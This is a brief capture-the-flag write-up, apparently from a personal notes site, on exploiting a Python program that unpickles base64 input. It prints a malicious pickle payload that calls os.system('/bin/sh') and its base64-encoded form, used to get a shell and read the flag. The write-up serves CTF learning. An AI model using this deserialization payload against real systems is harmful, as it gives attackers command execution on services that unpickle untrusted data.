

The interesting function is `import`
Breaking the `import` function gives us an error

So it wants a **base64** encoded pickle object and we need to read the flag. Let's get a shell using a malicious pickle object.
reading: https://checkoway.net/musings/pickle/
```
cos
system
(S'/bin/sh'
tR.
```
base64 encoding that gives us
`Y29zCnN5c3RlbQooUycvYmluL3NoJwp0Ui4=`
and passing that to the program...

---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #python #pickle #deserialization #pwn
Related: [[Peak Hill]]